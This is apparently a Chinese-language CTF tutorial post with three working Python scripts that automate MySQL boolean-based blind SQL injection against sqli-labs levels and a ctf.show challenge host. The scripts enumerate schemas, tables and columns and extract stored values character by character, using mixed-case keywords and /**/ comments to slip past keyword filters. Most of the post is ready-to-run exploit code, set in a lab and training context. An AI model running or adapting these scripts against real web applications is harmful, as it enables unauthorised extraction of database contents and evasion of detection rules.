mysql基于布尔的盲注,使用python脚本爆破

使用python脚本,根据返回页面中是否包含表示成功的flag图片,逐字符爆破出数据库中的内容,实现自动化爆破

判断返回结果中是否存在图片路径

import requests
import time

# Boolean-based blind probe against a local sqli-labs instance (Less-14).
# The only information channel is whether the response body contains
# "/images/flag.jpg" (checked below). Each POST asks one question of the
# form "is ascii(substr(<query>, i, 1)) greater than mid?", and the l..r
# bounds are narrowed until they meet, so a character costs at most about
# seven requests (the 33..130 range is halved each round).
# NOTE(review): from a monitoring standpoint this is a burst of POSTs to one
# endpoint whose `uname` field differs only in two integers (position and
# threshold). The SQL keywords are mixed-case and use `/**/` in place of
# spaces, so signature rules keyed on lowercase keywords separated by
# whitespace will not match — normalise (strip comments, casefold) first.
url = "http://127.0.0.1/sqli-labs-master/Less-14/"
payload = {
    "uname" : "",
    "passwd" : "123456",
    "submit" : "Submit"
}
result = ""
# i is the 1-based substr() position; 100 caps the recovered length.
for i in range(1,100):
    # Search bounds for the character code at position i.
    l = 33
    r =130
    mid = (l+r)>>1
    while(l<r):
        # enumerate schema names
        payload["uname"] ="-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})-- ".format(i, mid)

        # enumerate table names
        #"-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctfshow'),{0},1))>{1})-- ".format(i, mid)

        # enumerate column names
        #"-1\" or 0^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'flagb'),{0},1))>{1})-- ".format(i,mid)

        #######################
        #"-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid)

        #payload["uname"] ="-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid)

        html = requests.post(url,data=payload)
        print(payload)
        # The script treats the flag image being present as the injected
        # `> mid` comparison being true, and moves the lower bound up.
        if "/images/flag.jpg" in html.text:
            l = mid+1
        else:
            r = mid
        mid = (l+r)>>1
    # Stop early if the resolved character is a space.
    if(chr(mid)==" "):
        break
    result = result + chr(mid)
    print(result)
print("flag: " ,result)

判断返回结果中是否有特定字符串

import requests

# Same boolean-oracle approach against a ctf.show challenge host, this time
# through the GET parameter `id`. The oracle is whether the string "Dumb"
# appears in the response body (checked below); character codes are
# binary-searched over 32..126.
url = "http://47b9f914-0fd8-44fc-964f-d44867657b75.challenge.ctf.show/"

result = ''
# i is the 1-based substr() position; it is advanced at the top of every
# outer iteration, so the first probed position is 1.
i = 0

while True:
    i = i + 1
    # Search bounds for the character code at position i.
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
        payload = f'if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0)%23'
        data = {
            'id': f"100')||{payload}||('0"
        }
        r = requests.get(url,params=data)
        # The script treats "Dumb" in the body as the injected `> mid`
        # comparison being true.
        if "Dumb" in r.text:
            head = mid + 1
        else:
            tail = mid

    # A lower bound that never moved (32) is treated as end of string.
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

通过sqli-labs的第44关,使用基于返回结果中是否有图片的判断方式,并加入了字符串过滤的绕过

注意burp的返回结果中存在登录重定向:浏览器会自动跟随重定向并显示跳转后的页面,而burp不会自动跟随重定向,所以可以直接根据burp的原始返回结果来判断

此脚本使用了绕过特殊字符过滤的方法

#author:yu22x  improve by jay17
import requests
import string
import base64


# Boolean-oracle variant for sqli-labs Less-44 (login form). The injected
# expression is sent in `login_password`, and the oracle is the *absence*
# of "/images/slap1.jpg" in the response (see the `not in` check below).
# Characters are found by a linear scan over codes 32..127 with `like {j}`
# rather than a binary search, so one position can cost up to 96 requests;
# the search stops at the first code the oracle accepts.
url="http://172.18.38.125:1470/Less-44/login.php"
# NOTE: this charset is never read — `s` is reassigned to the payload string
# inside the inner loop before any use.
s=string.ascii_letters+string.digits
flag=''
# i is the 1-based substr() position; 999 is just an upper bound on length.
for i in range(1,999):
    print(i)
    for j in range(32,128):

        # enumerate schema names
        s = f"999'/**/or/**/if(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"

        # enumerate table names
        #s = f"999'/**/or/**/if(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"

        # enumerate column names
        #s = f"999'/**/or/**/if(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"

        #######################
        #s = f"999'/**/or/**/if(ord(substr((Select/**/grOUp_cOncat(flag)/**/frOm/**/flag),{i},1))/**/like/**/{j},1,0)#"



        #sre = s[::-1]   # reversed
        #sbase=str(base64.b64encode(sre.encode("utf-8")), "utf-8")   # base64


        #data={
        #    'id':s,
        #}


        data={
            "login_user":"1\'--+",
            "login_password":s,
            "mysubmit":"Login"
        }

        r=requests.post(url,data=data)
        #print(r.text)
        # The script treats the image being absent as the injected
        # `like {j}` comparison being true, and takes j as this character.
        if "/images/slap1.jpg" not in r.text:        # note: the test is [not in]
            flag+=chr(j)
            print(flag)
            break

 

